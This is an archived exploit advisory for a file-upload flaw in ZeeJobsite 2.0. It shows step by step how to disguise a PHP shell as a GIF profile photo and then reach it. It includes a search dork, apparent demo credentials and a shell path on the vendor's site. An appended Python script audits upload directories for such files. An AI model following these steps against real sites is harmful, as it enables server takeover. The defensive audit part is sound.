Zeeways ZeeJobsite 2.0 - Arbitrary File Upload

EDB-ID: 7062

Author: ZoRLu

Type: webapps

Platform: PHP

Date: 2008-11-08


ZEEJOBSITE v2.0 remote file Upload

author: ZoRLu msn: trt-turk@hotmail.com

home: www.z0rlu.blogspot.com

dork: "Copyright-2008@zeejobsite.com"

date: 08/11/2008 ( sending it right now, the time is 10:40 : ) )


first, register on the site

then add this code to the head of your shell:

GIF89a; 

example your_shell.php:

GIF89a;
<?

...

...

...

?>

and save it as your_shell.php


then log in to the site as a jobseeker ( direct link: localhost/jobseekers/jobseekerloginpage.php )

and edit your profile ( direct link: http://localhost/jobseekers/editresume_next.php?rid=[id] )

add your photo ( upload your_shell.php ); after the new page opens, right-click your photo and select Properties

copy the photo link and paste it into your browser to reach your shell

your_shell:

localhost/script_path/jobseekers/logos/[id].php


example for demo:

user: sabrina

passwd: testing:

login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php

change profile direct link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47

and your_shell link:

http://zeejobsite.com/jobseekers/logos/7271406.php


thanks: str0ke & yildirimordulari.org  &  darkc0de.com

# milw0rm.com [2008-11-08]
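
For site owners: the advisory describes a file that begins with GIF89a; being accepted as a photo and stored under jobseekers/logos/ with a .php extension. The following audit of such an upload directory is an added example, not part of the original advisory or the ZeeJobsite code. The extension lists, the open-tag heuristic and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Assumption: extensions the web server hands to PHP; match this to the real handler config.
EXEC_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
IMAGE_EXTS = {".gif", ".jpg", ".jpeg", ".png"}
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n")
# Heuristic: "<?php", "<?=" or a short tag plus whitespace ("<?xml"/"<?xpacket" are skipped).
PHP_OPEN = re.compile(rb"<\?(?:php|=|\s)", re.IGNORECASE)
R_EXEC = "executable extension in upload directory"
R_EXT = "extension not on image allowlist"
R_POLY = "image signature with PHP open tag"


def audit_upload_dir(root):
    """Return sorted (relative_path, reason) findings for every file under root."""
    findings = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        ext = path.suffix.lower()
        data = path.read_bytes()
        if ext in EXEC_EXTS:
            findings.append((rel, R_EXEC))
        elif ext not in IMAGE_EXTS:
            findings.append((rel, R_EXT))
        if data.startswith(IMAGE_MAGIC) and PHP_OPEN.search(data):
            findings.append((rel, R_POLY))
    return sorted(findings)


def build_sample_dir():
    """Constructed sample data: a stand-in for jobseekers/logos/ with harmless contents."""
    root = tempfile.mkdtemp(prefix="logos_sample_")
    samples = {
        "1001.php": b"GIF89a;\n<?\n/* constructed placeholder */\n?>\n",
        "1002.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
        "1003.gif": b"GIF89a;\n<?php /* constructed placeholder */ ?>\n",
        "readme.txt": b"constructed note\n",
    }
    for name, body in samples.items():
        (Path(root) / name).write_bytes(body)
    return root


if __name__ == "__main__":
    for rel, reason in audit_upload_dir(build_sample_dir()):
        print(f"{rel}: {reason}")
```

The open-tag match is a triage heuristic and can fire on random bytes in large compressed images; the executable-extension finding is the reliable signal.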